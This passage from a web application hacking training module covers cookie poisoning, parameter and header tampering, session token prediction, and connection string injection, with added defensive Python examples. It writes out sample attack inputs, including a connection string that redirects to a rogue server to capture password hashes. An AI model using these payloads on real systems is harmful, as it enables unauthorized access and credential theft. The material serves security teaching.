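    if est_bits < MIN_ENTROPY_BITS:
        findings.append("low-entropy")
    # A common prefix followed by consecutive integers is a counter, not randomness.
    matches = [re.fullmatch(r"(.*?)(\d+)", i) for i in ids]
    if len(ids) > 1 and all(matches) and len({m.group(1) for m in matches}) == 1:
        nums = sorted(int(m.group(2)) for m in matches)
        if nums == list(range(nums[0], nums[0] + len(nums))):
            findings.append("sequential-counter")
    # IDs that embed a user name are guessable once user names have been enumerated.
    if any(u and u in i for u in known_usernames for i in ids):
        findings.append("contains-username")
    return findings


if __name__ == "__main__":
    captured = ["user01", "user02", "user03"]          # constructed, modelled on the figure
    print(assess_session_ids(captured, known_usernames=["user01"]))
    print(assess_session_ids([new_session_id() for _ in range(20)]))
```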
Cookie Exploitation: Cookie Poisoning
- If the cookie contains passwords or session identifiers, attackers can steal the cookie using techniques such as script injection and eavesdropping.
- Attackers then replay the cookie with the same or altered passwords or session identifiers to bypass web application authentication.
- Attackers can trap cookies using tools such as OWASP Zed Attack Proxy, Burp Suite, etc.
Cookie Exploitation: Cookie Poisoning
Cookies frequently transmit sensitive credentials and can be modified with ease to escalate access or assume the identity of another user.
Cookies are used to maintain a session state in the otherwise stateless HTTP protocol. Sessions are intended to be uniquely tied to the individual accessing the web application. Poisoning of cookies and session information can allow an attacker to inject malicious content or otherwise modify the user's online experience and obtain unauthorized information.
Cookies can contain session-specific data such as user IDs, passwords, account numbers, links to shopping cart contents, supplied private information, and session IDs. Cookies exist as files stored in the client computer's memory or hard disk. By modifying the data in the cookie, an attacker can often gain escalated access or maliciously affect the user's session. Many sites offer the ability to "Remember me?" and store the user's information in a cookie, so he or she does not have to re-enter the data with every visit to the site. Any private information entered is stored in a cookie. In an attempt to protect cookies, site developers often encode the cookies. Easily reversible encoding methods such as Base64 and ROT13 (rotating the letters of the alphabet 13 characters) give many who view cookies a false sense of security. If the cookie contains passwords or session identifiers, attackers can steal the cookie using techniques such as script injection and eavesdropping. Attackers then replay the cookie with the same or altered
passwords or session identifiers to bypass web application authentication. Examples of tools used by the attacker for trapping cookies include OWASP Zed Attack Proxy, Burp Suite, etc.

OWASP Zed Attack Proxy
Source: https://www.owasp.org
OWASP Zed Attack Proxy Project (ZAP) is an integrated penetration testing tool for testing web applications. It provides automated scanners as well as a set of tools that allow you to find security vulnerabilities manually.
[Figure: OWASP ZAP "Untitled Session" window. The Request tab shows an intercepted HTTP request to tr.adinterax.com with its User-Agent, Cache-Control, Accept, Referer, Accept-Encoding, Accept-Language and Accept-Charset headers and a Cookie header carrying adxid and adxf values; the lower pane offers the Active Scan, Spider, Brute Force, Port Scan, Fuzzer and Params tools.]
Figure 13.45: OWASP Zed Attack Proxy Tool Screenshot
[Diagram: Web App Hacking Methodology, with steps including Attack Web Servers, Attack Authentication Mechanism, Attack Session Management Mechanism, Attack Data Connectivity, and Attack Web Services.]
Web App Hacking Methodology
Authorization protects the web applications by giving authority to certain users for accessing the applications and restricting certain users from accessing such applications. Attackers, by means of authorization attacks, try to gain access to the information resources without proper credentials. The ways to attack authorization schemes are explained on the following slides.
Authorization Attack
- Attackers manipulate the HTTP requests to subvert the application authorization schemes by modifying input fields that relate to user ID, user name, access group, cost, file names, file identifiers, etc.
- Attackers first access the web application using a low privileged account and then escalate privileges to access protected resources.
[Diagram: sources used for authorization attacks, including the query string and hidden tags.]
Authorization Attack
In an authorization attack, the attacker first finds the lowest privileged account and then logs in as an authentic user and slowly escalates privileges to access protected resources. Attackers manipulate the HTTP requests to subvert the application authorization schemes by modifying input fields that relate to user ID, user name, access group, cost, filenames, file identifiers, etc.
The sources that are used by the attackers in order to perform authorization attacks include the uniform resource identifier, parameter tampering, POST data, HTTP headers, query string, cookies, and hidden tags.

Parameter Tampering
Parameter tampering is an attack that is based on the manipulation of parameters that are exchanged between server and client in order to modify the application data, such as price and quantity of products, permissions and user credentials, etc. This information is usually stored in cookies, URL query strings, or hidden form fields, and is used to increase application control and functionality.

Post Data
Post data often is comprised of authorization and session information, since in most of the applications, the information that is provided by the client must be associated
with the session that had provided it. The attacker exploiting vulnerabilities in the post data can easily manipulate the post data and the information in it.
HTTP Request Tampering

Query String Tampering
- If the query string is visible in the address bar on the browser, the attacker can easily change the string parameter to bypass authorization mechanisms:
  http://www.juggyboy.com/mail.aspx?mailbox=john&company=acme%20com
  https://juggyshop.com/books/download/852741369.pdf
  https://juggybank.com/login/home.jsp?admin=true
- Attackers can use web spidering tools such as Burp Suite to scan the web app for POST parameters.

HTTP Headers
- If the application uses the Referer header for making access control decisions, attackers can modify it to access protected application functionalities:
  GET http://juggyboy:8180/Applications/Download?ItemID=201 HTTP/1.1
  Host: janaina:8180
  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.4
  Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
  Proxy-Connection: keep-alive
  Referer: http://juggyboy:8180/Applications/Download?Admin=False
- ItemID=201 is not accessible as the Admin parameter is set to false; the attacker can change it to true and access protected items.
HTTP Request Tampering
Attackers tamper with the HTTP request without using another user's ID. The attacker changes the request in transit, before the message is received by the intended receiver.

Query String Tampering
An attacker tampers with the query string when the web applications use query strings to pass on the messages between pages. If the query string is visible in the address bar on the browser, the attacker can easily change the string parameter to bypass authorization mechanisms.
FIGURE 13.46: Query String Tampering
Attackers can use web spidering tools such as Burp Suite to scan the web app for POST parameters.

HTTP Headers
If the application uses the Referer header for making access control decisions,
attackers can modify it to access protected application functionalities.
GET http://juggyboy:8180/Applications/Download?ItemID=201 HTTP/1.1
Host: janaina:8180
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.4
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Proxy-Connection: keep-alive
Referer: http://juggyboy:8180/Applications/Download?Admin=False
FIGURE 13.47: HTTP Headers
ItemID=201 is not accessible as the Admin parameter is set to false; the attacker can change it to true and access protected items.
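How the Download and mail.aspx handlers above should decide, as an added Python example that is not part of the module: the vulnerable form consults the client-supplied Admin parameter and the Referer header, the hardened form takes identity and role only from the server-side session and checks that the requested mailbox belongs to the caller. The item table, session table and status codes are constructed for the demo.

```python
from typing import Optional

# Constructed server-side state (not from any real application). The only trustworthy input
# is the session cookie, which maps to an identity and a role held on the server.
ITEMS = {201: "restricted", 105: "public"}
SESSIONS = {
    "sid-alice": {"user": "alice", "role": "user"},
    "sid-root": {"user": "root", "role": "admin"},
}


def _item_id(params) -> Optional[int]:
    try:
        return int(params.get("ItemID", ""))
    except ValueError:
        return None


def download_vulnerable(params, headers) -> int:
    """The pattern behind the figure: the decision rests on the client-supplied Admin
    parameter and on the Referer header, both of which the client can rewrite."""
    item = _item_id(params)
    if item is None or item not in ITEMS:
        return 404
    says_admin = params.get("Admin", "False").lower() == "true"
    came_from_admin_page = "Admin=True" in headers.get("Referer", "")
    if ITEMS[item] == "restricted" and not (says_admin or came_from_admin_page):
        return 403
    return 200


def download_hardened(session_id, params, headers) -> int:
    """The role comes from the server-side session; Admin and Referer are never consulted."""
    session = SESSIONS.get(session_id)
    if session is None:
        return 401
    item = _item_id(params)
    if item is None or item not in ITEMS:
        return 404
    if ITEMS[item] == "restricted" and session["role"] != "admin":
        return 403
    return 200


def read_mailbox_hardened(session_id, params) -> int:
    """mail.aspx?mailbox=john from the slide: the mailbox must belong to the caller,
    unless the caller's server-side role is admin."""
    session = SESSIONS.get(session_id)
    if session is None:
        return 401
    mailbox = params.get("mailbox", "")
    if mailbox != session["user"] and session["role"] != "admin":
        return 403
    return 200


if __name__ == "__main__":
    tampered = {"ItemID": "201", "Admin": "True"}
    forged = {"Referer": "http://juggyboy:8180/Applications/Download?Admin=True"}
    print(download_vulnerable(tampered, forged), download_hardened("sid-alice", tampered, forged))
```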
Authorization Attack: Cookie Parameter Tampering
- In the first step, the attacker collects some cookies set by the web application and analyzes them to determine the cookie generation mechanism.
- The attacker then traps cookies set by the web application, tampers with its parameters using tools such as OWASP Zed Attack Proxy, and replays them to the application.
Source: https://www.owasp.org
Authorization Attack: Cookie Parameter Tampering
Cookie parameter tampering is a method used to tamper with the cookies set by the web application in order to perform malicious attacks.
- In the first step, the attacker collects some cookies set by the web application and analyzes them to determine the cookie generation mechanism.
- The attacker then traps cookies set by the web application, tampers with its parameters using tools such as Paros Proxy, and replays them to the application.
Source: https://www.owasp.org
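One cookie design that resists the Remember Me exploit, cookie poisoning and the cookie parameter tampering described in this and the two earlier sections, as an added Python example that is not part of the module: the RememberUser=jason pattern beside an HMAC-signed, expiring cookie that rejects any edited payload. Encoding alone (Base64, ROT13) is reversible and gives no integrity; the authentication tag under a server-only key does. The key, timestamps and lifetime are constructed for the demo.

```python
import base64
import binascii
import hashlib
import hmac
from typing import Optional

COOKIE_NAME = "RememberUser"


def parse_plain_cookie(cookie_header: str) -> Optional[str]:
    """The module's RememberUser=jason pattern: whatever name the client sends is believed."""
    for part in cookie_header.split(";"):
        name, _, value = part.strip().partition("=")
        if name == COOKIE_NAME:
            return value or None
    return None


def _b64(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def _unb64(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def issue_signed_cookie(username: str, key: bytes, now: int, ttl_s: int = 14 * 86400) -> str:
    """Payload username|expiry, authenticated with HMAC-SHA256 under a key only the server holds."""
    if "|" in username:
        raise ValueError("username may not contain the separator")
    payload = f"{username}|{now + ttl_s}".encode("utf-8")
    tag = hmac.new(key, payload, hashlib.sha256).digest()
    return f"{_b64(payload)}.{_b64(tag)}"


def verify_signed_cookie(value: str, key: bytes, now: int) -> Optional[str]:
    """Return the user name only if the tag verifies and the cookie has not expired."""
    try:
        payload_b64, tag_b64 = value.split(".", 1)
        payload, tag = _unb64(payload_b64), _unb64(tag_b64)
    except (ValueError, binascii.Error):
        return None
    expected = hmac.new(key, payload, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        return None                      # edited, re-encoded or forged under another key: reject
    username, _, expiry = payload.decode("utf-8", errors="replace").partition("|")
    if not expiry.isdigit() or now > int(expiry):
        return None                      # replay of an old cookie past its lifetime
    return username


def edit_payload(value: str, old: str, new: str) -> str:
    """What cookie poisoning does to the signed form: decode, edit, re-encode, tag untouched."""
    payload_b64, tag_b64 = value.split(".", 1)
    edited = _unb64(payload_b64).decode("utf-8").replace(old, new).encode("utf-8")
    return f"{_b64(edited)}.{tag_b64}"


if __name__ == "__main__":
    key, now = b"demo-server-key-not-for-production", 1_350_000_000
    cookie = issue_signed_cookie("jason", key, now)
    print(parse_plain_cookie("RememberUser=admin"))                 # accepted blindly
    print(verify_signed_cookie(cookie, key, now + 3600))            # jason
    print(verify_signed_cookie(edit_payload(cookie, "jason", "admin"), key, now))  # None
```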
W e b A p p H a c k i n g M e t h o d o l o g y
A t t a c k S e s s i o n M a n a g e m e n t M e c h a n i s m
The session management mechanism is a key security component in most web applications. Because it plays this role, it has become a prime target for attacks against application session management. An attacker who breaks the application's session management can bypass even robust authentication controls and masquerade as another application user without knowing that user's credentials (user name, password). If the compromised user is an administrator, the attacker can take control of the entire application. The session management attacks are described on the following slides.
Session Management Attack

A session management attack is one of the methods attackers use to compromise a network. Attackers break an application's session management mechanism to bypass the authentication controls and impersonate a privileged application user. A session management attack involves two stages: session token generation and exploitation of session token handling.

In order to generate a valid session token, the attacker performs:
• Session token prediction
• Session token tampering

Once the attacker has a valid session token, the attacker tries to exploit the session token handling in the following ways:
• Session hijacking
• Session replay
• Man-in-the-middle attack
Attacking Session Token Generation Mechanism

Attackers steal valid session tokens and then predict the next session token from the tokens they have obtained.

Weak Encoding Example

https://www.juggyboy.com/checkout?SessionToken=%75%73%65%72%3D%6A%61%73%6F%6E%3B%61%70%70%3D%61%64%6D%69%6E%3B%64%61%74%65%3D%32%33%2F%31%31%2F%32%30%31%30

When the session token is just the hex encoding of the ASCII string user=jason;app=admin;date=23/11/2010, the attacker can predict another session token simply by changing the date and use it for another transaction with the server.

Session Token Prediction

Attackers obtain valid session tokens by sniffing the traffic or by legitimately logging into the application, and analyze them for encoding (hex-encoding, Base64) or any pattern. If any meaning can be reverse engineered from the sample of session tokens, attackers attempt to guess the tokens recently issued to other application users. Attackers then make a large number of requests with the predicted tokens to a session-dependent page to determine a valid session token.
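The following Python is an added example, not code from the module: it decodes the weak token shown above and implements an audit check that flags tokens which decode (percent, raw hex or Base64) to readable key=value fields, next to the opaque random token a server should issue instead. All token values other than the module's own are constructed.

```python
import base64
import secrets
from urllib.parse import unquote

# The module's weak token: percent-encoded hex of "user=jason;app=admin;date=23/11/2010".
WEAK_TOKEN = ("%75%73%65%72%3D%6A%61%73%6F%6E%3B%61%70%70%3D%61%64%6D%69%6E%3B"
              "%64%61%74%65%3D%32%33%2F%31%31%2F%32%30%31%30")


def candidate_decodings(token: str):
    """Yield every plausible plaintext for the token: percent, raw hex, Base64."""
    if "%" in token:
        yield unquote(token)
    try:
        yield bytes.fromhex(token).decode("ascii")
    except (ValueError, UnicodeDecodeError):
        pass
    try:
        padded = token.replace("-", "+").replace("_", "/")
        padded += "=" * (-len(padded) % 4)
        yield base64.b64decode(padded, validate=True).decode("ascii")
    except (ValueError, UnicodeDecodeError):
        pass


def decoded_structure(token: str):
    """Return the key=value fields hidden in a token, or None if it is opaque.

    A token that decodes to printable text with '=' separated fields is an
    encoding, not a secret: anyone holding one can read it, and a sibling
    token (same user, different date) is a guess away. Use this as an audit
    check on tokens your own application issues.
    """
    for text in candidate_decodings(token):
        if text.isprintable() and "=" in text:
            fields = dict(kv.split("=", 1) for kv in text.split(";") if "=" in kv)
            if fields:
                return fields
    return None


def issue_session_token() -> str:
    """Opaque replacement: 256 bits from the OS CSPRNG, looked up server-side.

    Nothing about the user, role or date is encoded in it, so there is no
    pattern to reverse engineer and nothing to adjust to reach another session.
    """
    return secrets.token_urlsafe(32)


if __name__ == "__main__":
    print("weak token decodes to :", decoded_structure(WEAK_TOKEN))
    fresh = issue_session_token()
    print("opaque token          :", fresh, "->", decoded_structure(fresh))
```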
Attacking Session Tokens Handling Mechanism: Session Token Sniffing
Attackers first sniff the network traffic for valid session tokens and then predict the next session token based on the sniffed one. The attacker uses the predicted session ID to authenticate to the target web application, so capturing a valid session token is the starting point of session management attacks. Attackers sniff the application traffic using a sniffing tool such as Wireshark or an intercepting proxy such as Burp. If HTTP cookies are being used as the transmission mechanism for session tokens and the Secure flag is not set (so the browser also sends the cookie over unencrypted HTTP), attackers can replay the cookie to gain unauthorized access to the application. Attackers can use session cookies to perform session hijacking, session replay, and man-in-the-middle attacks.
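The Secure-flag condition above can be checked automatically against a captured response. The following Python is an added example, not the module's code; the response headers are constructed to resemble the Set-Cookie header in the capture shown later, and the audit also reports the related HttpOnly and SameSite attributes.

```python
# Constructed HTTP response modelled on the capture; not real data.
SAMPLE_RESPONSE = """HTTP/1.1 200 OK
Server: Apache
Set-Cookie: n18u=deleted; expires=Thu, 22-Sep-2011 10:22:33 GMT; path=/; domain=.example.com
Set-Cookie: PHPSESSID=0123456789abcdef; path=/
Cache-Control: no-store, no-cache, must-revalidate
"""


def parse_set_cookie(value: str) -> dict:
    """Split 'name=value; Attr; Attr=v' into name, value and lower-cased attributes."""
    first, *rest = [p.strip() for p in value.split(";")]
    name, _, cookie_value = first.partition("=")   # first '=' only: values may contain '='
    attrs = {}
    for attr in rest:
        key, _, val = attr.partition("=")
        attrs[key.strip().lower()] = val.strip()
    return {"name": name.strip(), "value": cookie_value, "attrs": attrs}


def missing_protections(cookie: dict) -> list:
    """List the transport protections a session cookie is issued without."""
    missing = []
    if "secure" not in cookie["attrs"]:
        missing.append("Secure")      # also sent over plain HTTP: sniffable and replayable
    if "httponly" not in cookie["attrs"]:
        missing.append("HttpOnly")    # readable by script injected into the page
    if "samesite" not in cookie["attrs"]:
        missing.append("SameSite")    # attached to cross-site requests
    return missing


def audit_response(raw: str) -> dict:
    """Return {cookie_name: [missing protections]} for every Set-Cookie header."""
    findings = {}
    for line in raw.splitlines():
        header, _, value = line.partition(":")       # header names never contain ':'
        if header.strip().lower() == "set-cookie":
            cookie = parse_set_cookie(value.strip())
            findings[cookie["name"]] = missing_protections(cookie)
    return findings


if __name__ == "__main__":
    for name, missing in audit_response(SAMPLE_RESPONSE).items():
        print(f"{name}: missing {', '.join(missing) or 'nothing'}")
```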
Wireshark

Source: http://www.wireshark.org

Wireshark is a network protocol analyzer. It lets you capture and interactively browse the traffic running on a computer network. It captures live network traffic from Ethernet, IEEE 802.11, PPP/HDLC, ATM, Bluetooth, USB, Token Ring, Frame Relay, and FDDI networks. Captured files can be programmatically edited via the command line.
[Figure 13.49: Wireshark tool screenshot (Test(WS).pcapng, Wireshark 1.8.2). The packet list shows TCP, DHCPv6 and HTTP traffic, including a GET /newmail/mailsignout.php request and its HTTP/1.1 200 OK response; the hex pane shows the response headers, including Server: Apache, a Set-Cookie header with expires, path and domain attributes, and Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0.]
FIGURE 13.49: Wireshark Tool Screenshot
[Figure: Web App Hacking Methodology diagram; stages shown: Footprint Web Infrastructure, Attack Web Servers, Analyze Web Applications, Attack Authentication Mechanism, Attack Authorization Schemes, Attack Session Management Mechanism, Perform Injection Attacks, Attack Data Connectivity, Attack Web App Client, Attack Web Services]

Web App Hacking Methodology: Perform Injection Attacks
Injection attacks are very common in web applications. There are many types of injection attacks, such as web script injection, OS command injection, SMTP injection, SQL injection, LDAP injection, and XPath injection. Of all of these, the most frequently occurring is the SQL injection attack. Injection takes place when data supplied by the user is sent to an interpreter as part of a command or query. To launch an injection attack, the attacker supplies crafted data that tricks the interpreter into executing unintended commands or queries. Because of injection flaws, the attacker can read, create, update, and remove arbitrary data available to the application. In some cases, the attacker can even bypass a deeply nested firewall environment and take complete control of the application and the underlying system. The details of each injection attack are given on the following slides.
Injection Attacks
In injection attacks, attackers supply crafted malicious input that is syntactically correct according to the interpreted language being used, in order to break the application's normally intended input handling.

• Web Scripts Injection: If user input is used in code that is dynamically executed, enter crafted input that breaks the intended data context and executes commands on the server.
• OS Commands Injection: Exploit operating systems by entering malicious code in input fields if applications utilize user input in a system-level command.
• SMTP Injection: Inject arbitrary SMTP commands into the conversation between the application and the SMTP server to generate large volumes of spam email.
• SQL Injection: Enter a series of malicious SQL queries into input fields to directly manipulate the database.
• LDAP Injection: Take advantage of non-validated web application input vulnerabilities to pass LDAP filters and obtain direct access to databases.
• XPath Injection: Enter malicious strings in input fields in order to manipulate the XPath query so that it interferes with the application's logic.
Note: For complete coverage of SQL injection concepts and techniques, refer to Module 14: SQL Injection Attacks.
[Figure: Web App Hacking Methodology diagram; stages shown: Attack Web Servers, Attack Authentication Mechanism, Attack Session Management Mechanism, Attack Data Connectivity, Attack Web Services]

Web App Hacking Methodology: Attack Data Connectivity
Attacking the data connectivity allows the attacker to gain unauthorized control over the information in the database. The various types of data connectivity attacks, their causes, and their consequences are explained in detail on the following slides.
Attack Data Connectivity

Attackers directly attack data connectivity so that they can access sensitive information available in the database. Database connectivity attacks exploit the way applications connect to the database instead of abusing database queries.

Data Connectivity Attacks
• Connection String Injection
• Connection String Parameter Pollution (CSPP) Attacks
• Connection Pool DoS

Database connection strings are used to connect applications to database engines. Example of a common connection string used to connect to a Microsoft SQL Server database:

"Data Source=Server,Port; Network Library=DBMSSOCN; Initial Catalog=DataBase; User ID=Username; Password=pwd;"
Connection String Injection

A connection string injection attack can occur when dynamic string concatenation is used to build connection strings based on user input. If the string is not validated and malicious text or characters are not escaped, an attacker can potentially access sensitive data or other resources on the server. For example, an attacker could mount an attack by supplying a semicolon and appending an additional value. The connection string is parsed using a "last one wins" algorithm, so the hostile input is substituted for a legitimate value.

The connection string builder classes are designed to eliminate guesswork and protect against syntax errors and security vulnerabilities. They provide methods and properties corresponding to the known key/value pairs permitted by each data provider. Each class maintains a fixed collection of synonyms and can translate from a synonym to the corresponding well-known key name. Checks are performed for valid key/value pairs, and an invalid pair throws an exception. In addition, injected values are handled in a safe manner.

Before injection

A common connection string used to connect to a Microsoft SQL Server database:

"Data Source=Server,Port; Network Library=DBMSSOCN; Initial Catalog=DataBase; User ID=Username; Password=pwd;"

FIGURE 13.50: Before injection

After injection

In a delegated authentication environment, attackers can inject parameters simply by appending a semicolon (;) character followed by additional key/value pairs, using connection string injection techniques.

In the following example, the user is asked to give a user name and password for creating a connection string. Here the attacker enters the password as "pwd; Encryption=off", which means that the attacker has switched off the encryption setting. The resulting connection string becomes:

"Data Source=Server,Port; Network Library=DBMSSOCN; Initial Catalog=DataBase; User ID=Username; Password=pwd; Encryption=off"

FIGURE 13.51: After injection

When the connection string is populated, the Encryption value is added to the previously configured set of parameters.
Connection String Parameter Pollution (CSPP) Attacks
Connection string parameter pollution (CSPP) is used by attackers to steal user IDs and hijack web credentials. CSPP specifically exploits semicolon-delimited database connection strings that are constructed dynamically from user input to web applications. In CSPP attacks, attackers overwrite parameter values in the connection string.

Hash Stealing

An attacker replaces the value of the data source parameter with that of a rogue Microsoft SQL Server connected to the Internet and running a sniffer:

Data source=SQL2005; initial catalog=db1; integrated security=no; user ID=; Data Source=Rogue_Server; Password=; Integrated Security=true;

Attackers will then sniff Windows credentials (password hashes) when the application tries to connect to Rogue_Server with the Windows credentials it is running under.

Port Scanning

The attacker tries to connect to different ports by changing the port value and observing the error messages obtained:

Data source=SQL2005; initial catalog=db1; integrated security=no; user ID=; Data Source=Target_Server, Target_Port=443; Password=; Integrated Security=true;

Hijacking Web Credentials

The attacker tries to connect to the database by using the web application system account instead of a user-provided set of credentials:

Data source=SQL2005; initial catalog=db1; integrated security=no; user ID=; Data Source=Target_Server, Target_Port; Password=; Integrated Security=true;
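Both the "Password=pwd; Encryption=off" injection described earlier and the CSPP overrides above rely on the same "last one wins" parse. The following Python is an added example, not code from the module or from Microsoft's ADO.NET: it models a subset of the SQL Server connection string rules (synonyms, quoting, last duplicate key wins), contrasts the vulnerable concatenating builder with one that quotes values the way SqlConnectionStringBuilder does for you, and runs both module scenarios through it; the field sets are constructed.

```python
# Keyword synonyms: every alias collapses to one canonical key, so an injected
# "Server=" silently overrides an earlier "Data Source=".
SYNONYMS = {
    "server": "data source", "address": "data source", "addr": "data source",
    "network address": "data source", "database": "initial catalog",
    "uid": "user id", "user": "user id", "pwd": "password",
}


def canonical(key: str) -> str:
    key = " ".join(key.strip().lower().split())
    return SYNONYMS.get(key, key)


def parse_connection_string(conn: str) -> dict:
    """Return {canonical_key: value}; later duplicates overwrite earlier ones.

    A value wrapped in double or single quotes is taken literally, ';' and '='
    included ('""' inside a double-quoted value is one quote character).
    """
    result, i, n = {}, 0, len(conn)
    while i < n:
        eq = conn.find("=", i)
        if eq == -1:
            break
        key = conn[i:eq].rsplit(";", 1)[-1]      # tolerate empty ';;' segments
        i = eq + 1
        while i < n and conn[i] == " ":
            i += 1
        if i < n and conn[i] in "\"'":
            quote, i, buf = conn[i], i + 1, []
            while i < n:
                if conn[i] == quote:
                    if quote == '"' and conn[i + 1:i + 2] == '"':
                        buf.append('"')
                        i += 2
                        continue
                    i += 1
                    break
                buf.append(conn[i])
                i += 1
            value = "".join(buf)
            semi = conn.find(";", i)
        else:
            semi = conn.find(";", i)
            value = conn[i:n if semi == -1 else semi].strip()
        i = n if semi == -1 else semi + 1
        if key.strip():
            result[canonical(key)] = value
    return result


def build_unsafe(fields: dict) -> str:
    """The vulnerable pattern: user-supplied values pasted in verbatim."""
    return "".join(f"{k}={v}; " for k, v in fields.items()).strip()


def quote_value(value: str) -> str:
    """Quote a value so ';', '=', quotes or edge whitespace stay inside it
    (a superset of the cases the .NET builder quotes)."""
    if not (any(c in value for c in ";=\"'") or value != value.strip()):
        return value
    if '"' not in value:
        return f'"{value}"'
    if "'" not in value:
        return f"'{value}'"
    return '"' + value.replace('"', '""') + '"'


def build_safe(fields: dict) -> str:
    """Hardened builder: every value goes through quote_value."""
    return "".join(f"{k}={quote_value(v)}; " for k, v in fields.items()).strip()


def effective_settings(fields: dict, safe: bool) -> dict:
    """Build the string from application fields plus user input, then parse it
    the way the provider would; the dict is what the driver really uses."""
    conn = build_safe(fields) if safe else build_unsafe(fields)
    return parse_connection_string(conn)


# Constructed field sets matching the module's two scenarios.
ENCRYPTION_CASE = {"Data Source": "Server,Port", "Network Library": "DBMSSOCN",
                   "Initial Catalog": "DataBase", "User ID": "Username",
                   "Password": "pwd; Encryption=off"}

CSPP_CASE = {"Data source": "SQL2005", "initial catalog": "db1",
             "integrated security": "no",
             "user id": "; Data Source=Rogue_Server; Integrated Security=true",
             "Password": ""}

if __name__ == "__main__":
    for name, case in (("encryption", ENCRYPTION_CASE), ("cspp", CSPP_CASE)):
        print(name, "unsafe ->", effective_settings(case, safe=False))
        print(name, "safe   ->", effective_settings(case, safe=True))
```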
Connection Pool DoS
The attacker examines the connection pooling settings of the application, constructs a large malicious SQL query, and runs multiple queries simultaneously to consume all connections in the connection pool, causing database queries to fail for legitimate users.

Example:

By default, in ASP.NET, the maximum allowed connections in the pool is 100 and the timeout is 30 seconds.

Thus, an attacker can run 100 queries with 30+ seconds execution time within 30 seconds to cause a connection pool DoS, such that no one else would be able to use the database-related parts of the application.
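The arithmetic above (100 pooled connections, a 30 second pool timeout, 100 queries that each run 30+ seconds) can be played out in a model. The following Python is an added example, not the module's code: it simulates the pool with no database involved and shows how a command timeout and a per-client connection cap change the outcome for the next legitimate request; request timings and client names are constructed.

```python
import heapq
from dataclasses import dataclass


@dataclass
class Request:
    arrival: float    # seconds since start
    duration: float   # how long the query would run if nothing capped it
    client: str       # who sent it (attacker / legitimate user)


def simulate(requests, max_pool=100, wait_timeout=30.0,
             command_timeout=None, max_per_client=None):
    """Return {client: (served, failed)} for a discrete-time pool model.

    A request takes a free pooled connection for min(duration, command_timeout)
    seconds. If the pool is empty it waits for the earliest release, but fails
    (pool timeout error) when that wait would exceed wait_timeout. The defaults
    are the ASP.NET figures quoted above; max_per_client caps the connections
    one caller may hold at once.
    """
    busy = []            # min-heap of (release_time, client)
    open_by = {}         # client -> connections currently held
    outcome = {}         # client -> (served, failed)

    def record(client, served_delta, failed_delta):
        served, failed = outcome.get(client, (0, 0))
        outcome[client] = (served + served_delta, failed + failed_delta)

    for req in sorted(requests, key=lambda r: r.arrival):
        now = req.arrival
        while busy and busy[0][0] <= now:          # finished queries return
            _, owner = heapq.heappop(busy)
            open_by[owner] -= 1
        if max_per_client is not None and open_by.get(req.client, 0) >= max_per_client:
            record(req.client, 0, 1)               # rejected by the per-client cap
            continue
        if len(busy) >= max_pool:
            release, owner = busy[0]
            if release - now > wait_timeout:       # pool timeout: request fails
                record(req.client, 0, 1)
                continue
            heapq.heappop(busy)                    # wait for the first free connection
            open_by[owner] -= 1
            now = release
        run = req.duration if command_timeout is None else min(req.duration, command_timeout)
        heapq.heappush(busy, (now + run, req.client))
        open_by[req.client] = open_by.get(req.client, 0) + 1
        record(req.client, 1, 0)
    return outcome


def flood_scenario(**pool_settings):
    """100 slow attacker queries at t=0, then one ordinary query one second later."""
    flood = [Request(0.0, 60.0, "attacker") for _ in range(100)]
    victim = [Request(1.0, 0.1, "legit_user")]
    return simulate(flood + victim, **pool_settings)


if __name__ == "__main__":
    print("defaults          :", flood_scenario())
    print("command_timeout=5 :", flood_scenario(command_timeout=5))
    print("max_per_client=10 :", flood_scenario(max_per_client=10))
```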
[Figure: Web App Hacking Methodology diagram; stages shown: Footprint Web Infrastructure, Analyze Web Applications, Attack Authorization Schemes, Perform Injection Attacks, Attack Web App Client]

Web App Hacking Methodology: Attack Web App Client
Attacks on the client side of a web application are delivered through the server side: the client-side application is compromised when it interacts with a malicious or compromised server, or processes malicious data that the server returns. The attack takes effect when the client establishes a connection with the server; if there is no connection between client and server, no malicious data can be passed from the server to the client and there is no exposure. Consider an example of a client-side attack in which a web page served by a compromised site targets a specific browser weakness and exploits it successfully; as a result, the attacker behind that server gains unauthorized control over the client system.
Attack Web App Client
Attackers interact with server-side applications in unexpected ways in order to perform malicious actions against end users and to access unauthorized data. Attackers use various methods to perform these attacks.

The following attacks are performed by attackers to compromise client-side web applications:
- Cross-Site Scripting
- Redirection Attacks
- HTTP Header Injection
- Frame Injection
- Request Forgery Attacks
- Session Fixation
- Privacy Attacks
- ActiveX Attacks
Cross-Site Scripting

An attacker bypasses the browser's client-side security mechanism (the same-origin policy) by injecting malicious scripts into the pages of a particular website, so that the injected script runs in the victim's browser with the privileges of that site. Such scripts can read the victim's session data and can even rewrite the HTML content of the website as the user sees it.
Redirection Attacks

Attackers craft code and links that resemble the site the user intends to visit; when the user follows them, the user is redirected to a malicious website, where the attacker can obtain the user's credentials and other sensitive information. An open redirect, where a site forwards the browser to a URL taken unchecked from a request parameter, is the usual vehicle, because the link the victim clicks then genuinely points at the trusted site.
HTTP Header Injection

When user input is copied into an HTTP response header without removing carriage-return and line-feed characters, an attacker can terminate the header early and append headers of his own, or even an entire second response (HTTP response splitting). This attack can deface websites, poison web caches, and trigger cross-site scripting.
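Added illustration of the two mechanisms above, not code from the page: a redirect handler that copies a user-supplied target into the Location header, the same handler hardened against both CR/LF injection and off-site redirection, and a splitter that shows what a naive client or cache sees when the vulnerable handler is fed an injection string. ALLOWED_HOSTS, the function names and the SPLITTING_PAYLOAD string are constructed for the example.

```python
import re
from urllib.parse import urlsplit

# Hosts this application is allowed to redirect to (assumed for the example).
ALLOWED_HOSTS = {"juggyboy.com", "www.juggyboy.com"}


def build_redirect_vulnerable(target):
    """Copies the user-supplied target straight into the Location header.
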